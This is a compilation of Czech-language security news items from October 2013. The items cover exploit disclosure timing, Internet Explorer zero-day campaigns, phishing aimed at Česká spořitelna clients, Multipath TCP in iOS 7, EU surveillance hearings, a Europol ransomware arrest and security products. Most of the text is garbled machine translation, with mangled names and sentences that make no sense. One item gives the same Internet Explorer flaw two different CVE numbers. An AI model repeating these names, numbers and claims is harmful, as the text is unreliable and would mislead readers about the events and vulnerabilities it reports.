Bez ohledu na sekty nebo Splinter Cell patříte v informačním debaty , pro většinu lidí to všechno přijde k nalezení nejefektivnější způsob, jak získat opravu zveřejněna a v rukou uživatele, tak rychle, jak je to možné. To by mohlo znamenat koordinované zpřístupnění s prodejcem nebo plného zpřístupnění na veřejném mailing listu, nebo něco mezi tím. Ale linie trochu rozmazaný, když se diskuse stáčí do vhodnou chvíli říci veřejnosti, že daná chyba zabezpečení je aktivně využíván. Může se to zdát samozřejmé, že uživatelé by měli být řečeno, jakmile je to možné, dát jim to nejlepší šanci na obranu sebe nebo své sítě. Ale existuje mnoho dalších faktorů je ve hře, a to především skutečnost, že upozorňují uživatelé také probudí útočník komunitu.
To není malá pozornost, zejména pokud se jedná o chybu v široce nasazené aplikace, jako je Internet Explorer, Adobe Flash nebo Java. Výzkumníci ze společnosti Microsoft a Lancope podíval na veřejných vykořisťování oznámení v několika významných případů z posledních několika let a zjistil, že stejně jako mnoho věcí v životě, načasování je všechno.
"Vykořisťování zveřejnění je dobrá věc kdykoliv, ale otázka je, kdy a může to způsobit problémy," řekl Tom Cross of Lancope, který spolu s Holly Stewart Microsoft, hovořil na téma na Virus Bulletin 2013 konference zde ve středu.
Jeden z případů zkoumaných pár byl Nápověda a podpora Centrum CVE-2010-1885 zranitelnost. Že chyba byla zveřejněna na konferenci Plný seznam zpřístupnění v červnu 2010 a původní sdělení zahrnovalo proof-of-concept exploit. Nedlouho poté byl exploit integrován do některých útočných sad nástrojů a útoky proti přídavkem zranitelnosti. V ostatních případech, výzkumníci prošli koordinované zveřejňování procesu, práce s dodavateli, aby si opravu připraven předtím, než oznámí chybu a po oznámení vás bude využívání pokusy okamžitě vzroste útočníci roztáhněte opravu najít chybu za ním .
Není na rozdíl od obávané zveřejnění rozpravy rozhodnutí o tom, kdy informovat uživatele o využívání pokusů závisí na řadě faktorů. Pokud chyba je obzvláště závažné a již neprobíhají, rozšířené útoky, prodejce může také rozhodnout, informovat uživatele, i když není oprava k dispozici. Na druhé straně, v případě, že útoky jsou cílené a relativně skvrnité a prodejce nemá řešení připraveno, může se rozhodnout odložit oznámení.
"Pokud se nic, co můžete říci uživateli, aby to, že to není mnoho místa při zveřejňování využije," řekl. "Záleží na míře využití, geografické rozdělení, je patch k dispozici, pokud to bude, pokud to není. Je-li odpověď říkat lidem, nepoužívat kus softwaru, který je nutný k podnikání, je skutečností, že se to nestane. "
Je také pravda, že toto rozhodnutí není vždy výhradně v rukou dodavatele nebo dokonce vědcem, který objevil zranitelnost. V některých případech mohou třetí strany bezpečnostní společnost všimnete využít pokusů proti dříve neznámé zranitelnosti a vzít krok oznamující zákazníků.
"Neexistuje jedna odpověď," řekl Kříž.
lhůt nejsou chyby, kterou hledáte
2.10.2013 Zranitelnosti BERLIN-odvětví technologií je často používán vedoucích politiků, a jiné jako příklad toho, jak rychle se přizpůsobit a řadit tváří v tvář ničivé změny. Ale bezpečnostní komunita dělal obranu v podstatě stejným způsobem po několik desetiletí, a to navzdory skutečnosti, že hrozba dramaticky změnila, jak mají potřeby zákazníků. Tato situace je neudržitelná a musí se změnit za účelem zajištění účinné obrany proti zero-day zranitelností objevovat, říkají odborníci.
Použití činech proti nula dní, nebo neopravených zranitelností není nic nového. Útočníci hledali a použití nové chyby tak dlouho, jak tam byl software využívat. Co se změnilo v posledních letech, je rozsah použití nulové den exploit a druhu útočníků jejich použití. To bylo především jednotlivé útočníci a některé high-end počítačové trestné činnosti skupiny. Ale teď se lhůt používá vlád, zpravodajských agentur a státem podporovaných útočných týmů. V rukou těchto skupin, lhůt představují závažnou hrozbu pro cílové organizace, z nichž většina nemůže držet krok s náplastí, které vyplynuly na známých chyb, natož bránit proti útokům na nula dní.
"Není červeného tlačítka můžete tlačit, aby to jít pryč. To je jít dál a dál a dál, "Andreas Lindh I Secure ve Švédsku řekl v rozhovoru v časopisu Virus Bulletin 2013 zde ve středu. "Musíme se dostat naše priority jsou jasné. Co jsem naznačit, že se vrátíme k základům, spíše než aby si kupovali více nástrojů. Nástroje, které mají fungovat docela dobře, když budete používat správně. Vlastně máme opravdu dobré nářadí. Musíme začít se zaměřením na to podstatné, co je skutečně důležité. "
Lindh řekl, že stará koncepce obrany do hloubky, který byl zesměšňován v některých koutech v posledních letech, stále se drží ve většině případů, pokud organizace realizovat své technologie správně a ne sedět a čekat zázraky. Jedním z klíčů k úspěchu více často než ne proti vysoce postaveným útočníky, řekl, je ztvrdnout software jsme všichni závislí na pomocí technologií, jako ASLR a DEP, které brání mnoho společných útoků poškození dat v paměti. Řada způsobů, jak útočníci mohou dostat do systému klesla v posledních několika letech, Lindh řekl.
"Došlo ke snížení vektorů útoku, které lze použít," řekl. "Není to tak velký prostor pro útoky už ne."
V mnoha případech se využije které pracují nejsou šíleně kreativní kousky práce z elitních úderných týmů, nýbrž kopie využije vyrobené legitimních bezpečnostních výzkumníků.
"Tito lidé nejsou ve skutečnosti psát své vlastní hrdinské činy. Oni prosí o zbytky z bezpečnostních výzkumníků, "řekl Lindh.
Ačkoli hodně pozornosti na bezpečnostní komunity a médií je zaměřena na nula dní a nových útoků, je hodně škody v reálném světě provádí pomocí exploitů proti známých chyb. Řešení těchto otvorů je efektivní způsob, jak zvýšit své vítězné procento, Lindh řekl.
"Musíme vědět, že když vidíme chyby v softwaru není plně rozvinut, nejsou to ty, které jsme byly vytipovány jako rozhodující. Musíme změnit, "řekl. "Musíme se připojit mezery, které jsou ponechány. Musíme to udělat na základě toho, co se naučili, a pak musíme udělat to znovu a znovu a znovu. Dříve nebo později se svět bude měnit a musíme změnit s ním. Musíme lépe upřednostňovat to, co děláme. Musíme přestat krmit uživatelům všechny tyto BS o apts po celou dobu. Je to nepomáhá. "
Tři nové útoky a používat IE zero-day exploit
2.10.2013 Zranitelnosti | Hacking Útočníci jsou i nadále hromadit na kritickém Internet Explorer nulové den, který zůstává unpatched dva týdny poté, to bylo hlásil.
Během posledních dvou týdnů se zdá, že přinejmenším tři oddělené kampaně cílené útoku byly pomocí stejné chyby dříve používaný Dog operace zástupce, kampaň, že likvidace by byla ohrožena japonských sdělovacích prostředků a technologické systémy v polovině září.
Výzkumníci FireEye nejprve objevil DeputyDog kampaň - která zadlužuje CVE-2013-3893 zranitelnost - o něco více než před týdnem. Nyní Slovo přijde, že tři další, nesouvisející kampaně, Taidoor, th3bug a Web2Crew také pomocí stejného exploit.
Web2Crew byl spatřen dne 25. září používáte Internet Explorer zranitelnosti k poklesu vzdáleného přístupu Trojan PoisonIvy do počítačů - některé patří k finanční instituce. Zatímco činem byl umístěn na serveru v Tchaj-wanu, IP adresy z Hongkongu byl použit hostit své velení a řízení server, IP adresu, která FireEye spojené s Web2Crew v průběhu měsíce srpna.
Díky CVE-2013-3892 zranitelnost, Taidoor, druh malware, který byl viděn ohrožení oběti na Tchaj-wanu přes léto se vynořil na tchajwanské vládní webové stránky na 26.září.
Konečně, FireEye si také všiml kampaň škodlivého herec th3bug pomocí zranitelnosti 27.září. To kampaň, stejně jako Web2Crew, rozpoutal PoisonIvy náklad pro ty, kdo navštívil nějaké webové stránky, je ohrožena.
FireEye v Ned Moran a Nart Villeneuve, který psal na blogu o novém kampaní včerejší poznámku, že se jedná o obvyklý jev.
"To není neobvyklé pro APT skupin ruce pryč využije k ostatním, kteří jsou nižší na zero-day potravinového řetězce - zvláště poté, co se stanou veřejně dostupnými exploit," napsal dva.
Zatímco exploit nejsou veřejně dostupné samo o sobě, to jistě stala se více rozšířená v celé počítačové trestné činnosti v podzemí jako pozdní. V pondělí vydal Metasploit exploitu modul pro zranitelnosti, něco, co bude téměř jistě rozjet útoky pomocí chyba.
Zatímco Microsoft vydala fixit nástroj pro chyby v září a nutil starší IE uživatelům stáhnout a použít ji, někteří si mysleli, že by společnost mohla ještě vydat mimo pásmo náplasti opravit chybu. Na tomto místě se společnosti obvyklé Patch vydání naplánováno na úterý příští úterý, zdá se, že uživatelé budou i nadále náchylné nejméně další týden.
Obamacare související registrace domény špice, vláda vypnutí registrace domén začátek
2.10.2013 Ostaní
Za posledních 24 hodin DomainTools hlásil nám, že více než 50 domén souvisejících s americkou vládou Částečné vypnutí byly zaregistrovány. Asi třetina z nich jsou přívrženec orientovaný, se odstaví většinu ze zbytku. Během stejného časového období, byl ver 40 domén registrovaných týkající se cenově dostupnou péči zákon (hovorově známý jak Obamacare). Zatím žádný spam neukázal buď na předmětech, které bylo překvapující pro mnohé z nás, kteří sledují tyto trendy.
Zatímco tyto specifické datové body jsou US-orientovaný, lekce obecně není. Kdykoli tam je velká událost je obvykle odpovídající uptick v nové domény registrované týkající se těchto událostí a spamových kampaní. Poradenství pro uživatele je stejný, neklikejte na náhodné e-maily, a pokud chcete udělat on-line podnikání, a to vždy kladně zadat URL známých subjektů, namísto použití e-mailu nebo webových odkazů. Federální pojištění Výměna webová stránka je healthcare.gov , například. Jiné stránky hlásající, že jsou * v * federální výměnu pravděpodobně méně než upřímný, zvláště jsou-li něco jiného než. Gov.
Co dělá tyto kampaně úspěšná, je uptick v mediální pokrytí a povědomí občanů, a to zejména v případě, že je vizuální složka. Jeden z nejúspěšnějších kampaní tohoto typu byl spam kampaň týkající se zachycení Usáma bin Ládin a spojuje domnělý být obrázky nebo videa z této události. Bombardování Boston je dalším příkladem. Co je potenciál pro Obamacare související podvody do práce, je stabilita nového webu v kombinaci s nějakým zmatku podrobnostech nového zákona. Tam, kde není jasnost je podvod je to možné.
Povědomí typ pro ty, které podporují uživatele je, že kdykoli se něco takového stane, je přezkoumat s uživateli stejné tipy: Neklikejte na odkazy, jděte jen na známé webové stránky a dejte jim vědět, on-line darebáci budou používat populární zájem subjektů na nakazit s malware.
John McAfee chystá prostředí odolné proti NSA
Bezpečnost Excentrický milionář, původní autor antiviru McAfee, oznámil D-Central, zařízení, které má blokovat výzvědné sítě agentury NSA.
John McAfee rozhodně není přehlédnutelná osobnost. K nedávnému úniku před policií ve státě Belize, kde měl být vyslechnut kvůli násilnému úmrtí jeho souseda, následnému zadržení v Guatemale (kvůli podezření z ilegálního vstupu do země) a poněkud kontraverznímu průběžnému videoblogování nyní plánuje další, nepochybně stejně barvité a potenciálně problematické dobrodružství. Jeho protivníkem tentokrát nebudou policejní sbory zemí střední Ameriky, ale samotná agentura NSA.
John McAfee vystoupil na technologické konferenci C2SV v San José a uvedl projekt, na kterém právě pracuje. Jde o zařízení D-Central, které by dle něj mělo zajistit našim životům lepší bezpečnost a soukromí. Publikum se příliš technických detailů nedozvědělo, ale z toho mála zveřejněného můžeme usuzovat, že půjde o novou variaci na u nás neznámé mobilní Wi-Fi hotspoty, jako jsou MiFi a Pirate Box.
Novatel MiFi Liberate nabízený firmou AT&T je mobilní dotekové zařízení, hotspot, pro sdílení připojení do sítí LTE. Poslední verze za cenu 170 dolarů nabízí malý mediální server, který mimo vlastní mediální funkce dokáže do Internetu připojit až 10 zařízení Wi-Fi. Recenze jsou velmi pozitivní, co se týče rychlosti a výdrže baterií – příchozí kapacita 20 Mb/s a odchozí 12 Mb/s není něco, co bychom mohli ignorovat, stejně jako téměř 17hodinovou výdrž baterie (kapacita 2900 mAh není až o tolik větší než u špičkových mobilů).
Pirate Box je mírně odlišné zařízení, opět je to mobilní zařízení za pouhých 35 dolarů, které je více orientované na anonymní sdílení služeb a komunikaci. Není samo o sobě přímo připojené k internetovému provozovateli, místo toho vytváří jistou podobu komunitní sítě s okolními zařízeními Wi-Fi, jejichž uživatelé potom mohou vzájemně komunikovat zabezpečenými internetovými protokoly.
D-Central by měl opět být malý mobilní „přístroj“, který se připojí k našemu PC, tabletu či chytrému telefonu. Propojená zařízení vytvoří malou dynamickou LAN komunikující s uživateli v sousedství v privátním nebo veřejném módu. Při privátní komunikaci D-Central zajistí šifrované rychlé zprávy mezi přáteli. Ve veřejném módu bude šifrovaná komunikace garantovat anonymní komunikaci s blokováním všech osobních údajů. V případě potřeby vytvoří přes Internet tunel VPN k dalším uživatelům kdekoli na světě.
John McAfee zdůraznil fakt, že se šokovaná bezpečnostní komunita postupně dozvídá rozsah, v jakém agentura NSA ovlivnila vývoj či přímo oslabování běžně používaných bezpečnostních protokolů, a že je jen málo technologií, kterým dnes můžeme důvěřovat. Zdá se, že tedy jeho řešení bude postaveno na zcela nových šifrovacích metodách.
Vývoj D-Central je teprve v rané fázi, ale plně funkční prototyp máme očekávat do šesti měsíců. Mateřská společnost Future Tense, již spustila stránky s běžícím odpočtem nastaveným na 23. března 2014.
Národní bezpečnostní tým varoval před útoky cílenými na klienty České spořitelny
1.10.2013 Phishing Národní bezpečnostní tým CSIRT, který je provozován sdružením CZ.NIC, varoval před phishingovými zprávami, které cílí na uživatele České spořitelny. Prostřednictvím podvodných e-mailů se snaží počítačoví piráti vylákat přístupové údaje k cizím bankovním účtům a informace o platebních kartách. „Jedná se o klasickou phishingovou zprávu. Odkaz, který se v ní nachází, neodkazuje na stránky České spořitelny, ale na adresu www.dt.smesx.gov.cn/images/cz/index.html, která je ovládána útočníkem, který se tak snaží získat přihlašovací údaje nepozorných uživatelů,“ varoval bezpečnostní analytik Pavel Bašta z týmu CSIRT.
„Zde je pak uživatel přesměrován na další stránku, která obsahuje kopii stránek České spořitelny. Náš tým již požádal zodpovědné administrátory o zablokování zdroje tohoto spamu a také o zablokování phishingové stránky,“ doplnil bezpečnostní analytik.
Podle něj naštěstí není kopie služby Servis24 příliš zdařilá, především co se designu stránky týče, a tak by pozornější uživatelé měli snadno rozpoznat, že jde o podvrh. Na druhou stranu web je sepsán obstojnou češtinou a neobsahuje výraznější gramatické chyby, které zpravidla pomáhají podvodné stránky odhalit.
Na potenciální hrozbu upozornila také banka prostřednictvím svých internetových stránek. „Varovali jsme klienty, aby na e-mail neodpovídali a nezadávali žádné své citlivé údaje,“ uvedl na dotaz Novinek Jan Holinka z tiskového centra spořitelny.
Podvodné stránky služby Servis24 FOTO: CSIRT
Podle zástupců banky se navíc podvodníci nesnaží získat přístup pouze k bankovnímu účtu, ale i platebním kartám, které jsou v případě získání kompletních údajů velice snadno zneužitelné. Uživatelé by tak rozhodně neměli hrozbu podceňovat.
„Pokud kdokoli z vás na zprávu zareagoval, doporučujeme ihned kontaktovat naše klientské centrum na bezplatné telefonní lince 800 207 207, kde s vámi náš telefonní bankéř zablokuje vaši platební kartu či přístup do internetového bankovnictví a následně vygeneruje nové přihlašovací údaje nebo zajistí výrobu nové platební karty,“ doporučili zástupci banky.
Internetové bankovnictví České spořitelny.
Twitter DM spam / malware
Spam | Viry
Tam byl nedávný plivl účtů Twitter odesílání přímé zprávy (DZ) s jinými, které jsou buď spam nebo odkaz na malware pomocí zkrácené URL. V některých případech mohou být účty odesláním DM, bylo odcizeno díky slabých hesel, malware napadení na počítači uživatele, nebo aplikace třetích stran, ne hrát pěkná. Pověsti o Twitter, které byly napadeny hackery jsou také prošel kolem, jsem neviděl žádný důkaz v obou směrech. Pokud jste se stali obětí účtu Twitter cvrlikání nebo zaslání DM bez vašeho souhlasu, dejte nám vědět přes náš kontaktní stránku nebo komentář níže. Pokud máte DM od někoho, kdo se zdá být spam nebo má podezřelý odkaz v něm prosím, předat ji dál.
Buďme opatrní, tam venku!
iOS 7 Přidá Multipath TCP
OS | Mobil
iOS 7 přidal novou funkci, která nebyla široce inzerované. Tato funkce je vícecestných TCP (MPTCP) v současné době využívá Siri, ale mohou být použity v jiných aplikacích dolů na silnici. MPTCP je rozšíření TCP umožňuje TCP spojení mezi hostiteli pomocí více IP adres. Jeho design je zvláště zajímavý v tom, že je zpětně kompatibilní s firewally. Pokud jako brána firewall nebo jiné síťové zařízení týče, každý vícecestné TCP spojení je platný TCP připojení přes jeho vlastní pořadová čísla a vlastní handshake nastavit a zbourat. Všechny "kouzlo" signalizace se děje přes nové možnosti TCP.
MPTCP není vlastní. Je to standardní (RFC 6824 [1]), a byl implementován pro Linux například, ale dosud neviděl moc použití, což může způsobit, že zjistíte to poprvé při pohledu na provoz z iOS zařízení 7.
Stejně jako rychlý opakovací: TCP spojení ze strany klienta odesláním SYN paket na server. Server odpoví SYN-ACK a klient dokončí handshake pomocí ACK paket. Během tohoto handshake, budou hostitelé vyměňovat náhodné počáteční pořadová čísla. Pořadové číslo se zvyšuje o jednu pro každé přenášené bajtu. Pořadové číslo je velmi důležité k sestavení datového toku. Bez pořadovým číslem, může datový tok ztratit rozkaz.
Zjednodušeně by se dalo nastavit dvě spojení TCP, a jen distribuci dat mezi nimi. Ale pokud pořadové číslo proud není kontinuální, mnoho firewally narušit spojení. To je důvod, proč každý proud MPTCP má vlastní pořadové číslo. Ale to staví další problém: Jak můžeme vědět, jak proudy, nebo "subflows", jak je nazývá RFC, zapadají?
Umožňuje první mluvit o tom, jak spojení MPTCP je nastavení:
TCP spojení začíná jako každý TCP spojení s SYN / SYN-ACK / ACK handshake. Nicméně, pokud je k dispozici MPTCP, budou tři handshake pakety zahrnují "Multipath Capable (MP_CAPABLE)" možnost volby. Na obou koncích je třeba podporovat mnohacestnému, nebo nebudou použity. MP_CAPABLE možnost obsahuje tlačítko, které budou později použity k ověření dalších subflows. Hostitel nyní může přidat nový dílčího toku, a to dílčího toku bude ověřena pomocí hash odvozený z klíčů vyměněných dříve, a nonces které jsou jedinečné pro každého bez dílčího toku. Volba MP_JOIN se používá pro přenos těchto dat. V průběhu připojení můľe hostitelé vzájemně informují o nově získaných adres a mohou využívat nové subflows. Od každého dílčího toku má svou vlastní sadu pořadovými čísly, "Pořad Signály" slouží pro komunikaci jak se pořadová čísla v mapě dílčího toku ke kombinované datový tok. Protokol má spoustu drobných detailů, které dělají to vhodný pro počítače připojené do více bezdrátových sítí. Například se mohou použít různé subflows mít různé priority. Jedno použití scénář je mobilní telefon připojen k WiFi, stejně jako mobilní sítě, a roaming mezi nimi. Například spuštění TCP spojení doma, a nadále používat, až budete odcházet z domu a telefon se přepne do celulární sítě. Dokud obě sítě jsou k dispozici na chvíli může spadnout MPTCP připojení WiFi a výhradně používat mobilní datové připojení telefonu dokud nedorazíte k jiné WiFi sítě. Ale dost o tom, jak funguje protokol, zde jsou některé pakety. Rychlé BPF zachytit tyto pakety (například s tcpdump):
tcp [12] a 0xF0 => 0xE0 Není to dokonalé, ale protože se podílejí možnosti jsou poměrně velké, najdete MPTCP pakety hledají větší velikosti záhlaví TCP. Tento filtr vyhledá záhlaví velikosti 56 a výše, přičemž 60 je maximální (nemáte opravdu potřebují bitovou masku na filtru). Wireshark a tshark řešit poměrně dobře s MPTCP. Například tshark displeje pro TCP možností:
Multipath TCP: Multipath Schopný Druh: Multipath TCP (30) Délka: 12 0000 .... = Multipath TCP podtyp: Multipath schopnost (0) .... 0000 = Multipath TCP verze: 0 Vícecestné TCP příznaky: 0x01 0 ... .... = Kontrolní potřeby: 0 .... ... 1 = Použít HMAC-SHA1: 1 MultiPath TCP odesílatele Legenda: 8848941202347829228 tcpdump na druhé straně má mnohem těžší: 16:44:15.681318 IP 70.91.145.11.57799> 17.174.8.5.443: Vlajky [S], seq 847601216, výhra 65.535, možnosti [mss 1460, nop, wscale 3, Unknown Možnost 3000017acdc123cc42a7ec, nop, nop, TS val 102569696 s. 0, sackOK, EOL], délka 0
se zobrazí pouze surový možnost jako "Neznámý Option" Option "0x30" náhodou "Multipath Capable" možnost.
Další možnosti: 0x31: MP_JOIN 0x32: DSS - Údaje Sekvence signálu 0x33: ADD_ADDR - přidat novou adresu 0x34: REMOVE_ADDR - Odstraňte adresu 0x35: MP_PRIO - změna dílčího toku prioritou 0x36: MP_FAIL - Záložní (slouží ke komunikaci s kontrolním součtem selhání zpět odesílateli) 0x37: MP_FASTCLOSE - Fast Close (jako TCP reset, ale pouze pro dílčího toku)
[1] http://tools.ietf.org/html/rfc6824
Poslanci slyšet US soukromí odborníky, informátory a Snowdenová rozvahu 01.10.2013. Bezpečnost Možnost pozastavit EU a USA jednání o obchodu, myšlenka vytvoření mezinárodní standardy ochrany soukromí a nutnost skutečné parlamentní dohled nad činností dozoru byly mezi projednávaným otázkám v pondělí na čtvrtém jednání Výboru pro občanské svobody vyšetřovacího výboru do USA a EU země "špehování občanů EU.
"Měl bys jít vpřed s novou obchodní dohody s USA [], pokud máte dostatečné záruky pro ochranu soukromí," navrhl Marc Rotenberg elektronického Privacy Information Centre, se sídlem v USA občanská práva organizace. Někteří poslanci vzali na vědomí jeho návrh, ale jiní odmítli. Členové šetření také jednali o možnosti stanovit mezinárodní normy pro ochranu soukromí. Jesselyn Radack, právník zastupující několik informátory, přečetl prohlášení Edward Snowdena říká, že "když jsem začal svou práci, to bylo s jediným záměrem, aby možné debata vidíme vyskytující se zde v tomto těle. Veřejná debata není možné bez povědomí veřejnosti (...) sledování celé populace, spíše než jednotlivci, hrozí, že největší lidská práva výzvou naší doby. " On uzavřel, že "dílo generace začíná zde s vašimi slyšení, a máte plnou míru vděčnosti a podporu." Sophie in 't Veld (ALDE, NL), který jednání předsedal, litoval, že USA a nizozemské orgány odmítl Výbor je pozvání k účasti na anketě slyšení. Potřeba dohledu výbor také vyslechl dva bývalí NSA zaměstnanců a jeden bývalý MI5 osoby. Ex-NSA senior executive Thomas Drake hovořil jako o "Stasi patologického potřebují znát všechno s tím, že si nikdy nepředstavoval, "že USA by se použít" Stasi "PrÛvodce pro své tajné programy pro hromadný dozor." Ex-NSA vedoucí pracovník řekl, že USA je "více touží říci" ano "ve jménu národní bezpečnosti, než plnit své povinnosti dohledu ". Ex-MI5 Annie zpravodajský důstojník Machoň, volal smysluplné UK parlamentního výboru dohledu nad činností dozoru, včetně právních vyšetřovacích pravomocí.
Více než 50% nechrání svá zařízení se systémem Android 01.10.2013. Zabezpečení | Bezpečnost Více než 50 procent z Android smartphone a tablet majitelé nepoužívají žádný bezpečnostní software na ochranu svých zařízení proti internetovým hrozbám-podle společnosti Kaspersky Lab. To je i přes dobře zdokumentované představě, že Android je dlouhodobě nejoblíbenější platformou Spotřebitelé kupují a používají zločinci k odcizení od nich. Přestože vysoký počet účastníků uvedlo, že nepoužívají bezpečnostní ochranu na svých mobilních zařízeních, výsledky ukázaly, že 40 procent smartphone a 42 procent vlastníků Android tablet účast v průzkumu uvedlo, že jste nainstalovali bezpečnostní řešení na svých zařízeních a nyní používat. Tyto výsledky zdůrazňují spotřebitelů způsob myšlení v době, kdy Android je dobře zaveden jako hlavní cíl pro zločinci mezi všemi mobilními platformami. Podle výzkumu společnosti Kaspersky Lab, se 99 procent současných vzorků malwaru zaměřených na mobilní zařízení byl vyvinut pro platformu Android. Tato hrozba je také roste: v roce 2012 společnosti Kaspersky Lab zjištěn škodlivý 35000 vzorků, přičemž hned v prvním pololetí roku 2013 výše zjištěna byla více než 47.000. Tam je také riziko prostředků, které jsou ztracené nebo odcizené. Pro mnoho lidí, chytré telefony a tablety jsou hlavním místem skladování fotografií a videa, korespondence s přáteli a rodinou, hesla a další cenné informace. Je až příliš snadné pro zařízení na špatném místě, nebo odcizení od osoby a mají všechny ty osobní údaje dostanou do nesprávných rukou.
Poskytovatelé počítačové kriminality služby zatčen v Evropě 01.10.2013. Kriminalita | Bezpečnost Evropské středisko Počítačová kriminalita (EC3) při Europolu podporoval španělské státní policie zatkla dva ukrajinské zločinci v Madridu, kteří prodávají počítačoví zločinci přístup k obrovskému počtu napadených počítačových serverů pro anonymizaci svých internetových aktivit. Oni jsou také podezřelý z praní nelegálních výnosů z policejní ransomware.
Provoz Ransom II - druhá tohoto druhu po jednom v Málaga (Španělsko) v únoru 2013 - byl vyvrcholením rozsáhlého šetření více než rok, potvrzující skutečnost, že policie Ransomware je stále velkou hrozbou pro občany EU. Dne 9. července , španělské národní policie zatkla dva zločince a hledal svůj dům. Jeden z nich byl přistižen, běh virtuálních strojů a chatování s ostatními zločinci. Spolu s řadou elektronických zařízení a digitálních důkazů, výši zhruba 50.000 v hotovosti a několik tisíc eur v e-měny bylo zadrženo při hledání. Jejich propracovaný praní špinavých peněz zařízení bylo zpracování výši zhruba 10.000 denně prostřednictvím různých elektronických platebních systémů a virtuálních měn. 21000 napadené servery společností nacházejících se v 80 zemích světa (1500 z nich ve Španělsku) měli společný rys, kterým nastavení přístupu byly prostřednictvím vzdálené plochy (RDP). S tímto nastavením by cybercriminal přístup k veškerým informace obsažené na serverech, pomocí plné oprávnění správce k systému, tj. absolutní kontrolu. Zločinci provozoval internetový obchod, kde byly ohroženy stroje "prodává" na 450 svých cybercriminal "zákazníky", kteří mohli vybrat místo (země) jejich upřednostňované servery. Tento španělský národní policejní vyšetřování byl podpořen z raných fázích odborníky Europolu, který organizoval a hostil koordinační setkání v dubnu 2013. Europol se poté usnadnil výměnu zpravodajských informací s ostatními členskými státy EU, dodávaných analytických zpráv, a podporoval operace na místě s mobilní kanceláře a technické poradenství. Europol obdrží údaje o napadených počítačů, takže to může být analyzovány a distribuovány zákona donucovací orgány, které zase mohou oznámí tato majitele serverů ovlivněny činností zločinců ". Podle Troels Oerting, vedoucí EC3, vývoj a propracovanost malware pokračovat a hrozba zůstane vysoká. Je důležité, aby občané pochopili, že oni by měli nikdy platit výkupné.
Běžné datové chyby porušení manipulaci 01.10.2013. Zabezpečení Údaje o porušení je problém, který může ovlivnit nějakou organizaci a National Cyber Security Awareness Month je příhodný čas, aby organizace začít připravovat na mimořádné události nebo rozšířit své současné plán odezvy.
"I když tam byl velký pokrok mezi podniky a institucemi v prevenci narušení údajů, může dojít k porušení stále a to je důležité provést správné kroky po nehodě," řekl Michael Bruemmer, viceprezident společnosti Experian. "Být řádně připravena nekončí s odpovědí plán. Organizace potřebují cvičit plán a ujistěte se, že bude mít za následek bezproblémové vyřízení, které zmírní negativní důsledky narušení dat." Tyto možné výsledky mohou zahrnovat ztrátu zákazníků, regulační pokuty a třídy akce soudních řízení. Studie ukazují, že většina organizací měla nebo očekávat, že narušení dat, která má za následek ztrátu zákazníků a obchodních partnerů, a více než 65 procent firem má, nebo si myslí, že budou trpět vážné finanční následky v důsledku nehody. Mezi Společnosti, které porušení, průměrné náklady hlášeny incidentů byla 9.400.000 dolarů za posledních 24 měsíců. . Tyto náklady jsou jen zlomek průměrné maximální finanční expozice 163.000.000 dolarů, že společnosti dotazované (porušení nebo ne) věří, že by mohl utrpět v důsledku kybernetické incidenty Podle Bruemmer, tři z nejčastějších chyb patří: Bez zapojení s externím poradcem - Získávat externí advokát je vysoce doporučeno. Ani jeden federální zákon či předpis upravuje bezpečnost ve všech typech citlivých osobních informací. V důsledku toho určit, které federální zákony, předpisy a pokyny jsou použitelné, závisí částečně na účetní jednotky nebo sektoru, které shromažďují informace a typ informací shromážděných a regulovány. Pokud interní zdroje jsou dobře se všemi platnými zákony a právním předpisům, je nejlepší, aby se zapojily právního poradce se zkušenostmi v oblasti narušení dat pomoci procházet tomto náročném prostředí. Žádné externí agentury zajistit - Všechny externí partneři by měli být na místě před narušení dat, takže mohou být vyzvány, okamžitě dojde k porušení. Proces výběru správného partnera, může nějakou dobu trvat, protože tam jsou různé úrovně služeb a různých řešení, aby zvážila. Navíc je důležité přemýšlet o důvěryhodnosti a bezpečnostních norem dodavatele před zarovnání značku firmy s ním. Nemít Soudní znalec nebo rozlišení agentuře identifikovat zpozdí narušení dat response procesu. bez jediného rozhodovatele - Zatímco tam je několik stran v rámci organizace, které by měly být o reakci na porušení ochrany dat týmu, každý tým potřebuje vůdce. Určete, kdo bude řidič odezvy plánu a primární kontakt na všech externích partnerů. Také nastínit strukturu interního výkaznictví s cílem zajistit vedení a všichni na reakce týmu je aktuální a na trati při narušení dat.
BrowserCheck dostane automatizovat každodenní skenování a Mac podporu 01.10.2013. Zabezpečení Qualys vydal novou verzi Qualys BrowserCheck , bezplatná služba, která pomáhá lidem udržet své prohlížeče a plug-iny up-to-date na ochranu proti škodlivému obsahu na internetu a škodlivý software.
Nejnovější verze nyní obsahuje rozšířenou podporu pro Mac a umožňuje uživatelům automaticky spustit každodenní skenování, které detekují, které prohlížeče, plug-iny, nastavení systému, bezpečnostní software, chybějící záplaty a aplikace jsou na každém počítači a zda je novější verze byly vydány v odpovídající dodavatelé. . Záznamy jsou generovány automaticky, kdykoliv prohlížeče nebo jejich plug-inů je nutné aktualizovat, což umožňuje uživatelům opravit a aktualizovat chybějící patche, které by mohly vystavit je na kybernetických hrozeb Qualys BrowserCheck nyní zahrnuje: rozšířený Mac podporu. BrowserCheck nyní nabízí hluboké skenování na Mac OS X 10.6 0,8 a novější podporuje hlavních prohlížečích (Safari, Chrome a Firefox), a kontroly na nejčastější plug-inů. Denní automatické skenování. Uživatelé si mohou nastavit BrowserCheck skenovat počítače denně. To určuje, které prohlížeče a pluginy jsou nainstalovány na každém počítači, který bezpečnostních opatření (jako jsou firewally, antivirové a šifrování disku) se povolí, a zda se některé aktualizace zabezpečení chybí nebo je nutné, aby odkazy na aktualizace. Schopnost vložit do BrowserCheck Vlastní . adresy URL . Použití BrowserCheck Business Edition, mohou IT administrátoři vložit BrowserCheck funkčnost v rámci jejich organizace 'domény webové stránky průběžně sledovat, jaké prohlížeče a plug-iny jsou nainstalovány na každém počítači Philippe Courtot, předseda představenstva a generální ředitel Qualys řekl: "Prohlížeče jsou dnes nejvíce důležitý kus technologie, které budeme spoléhat na v našich day-to-day činnosti, a tak pomáhá uživatelům udržet jejich prohlížeče a plug-iny up-to-date poskytuje obranu proti šíření útoků, těžit z nás. "
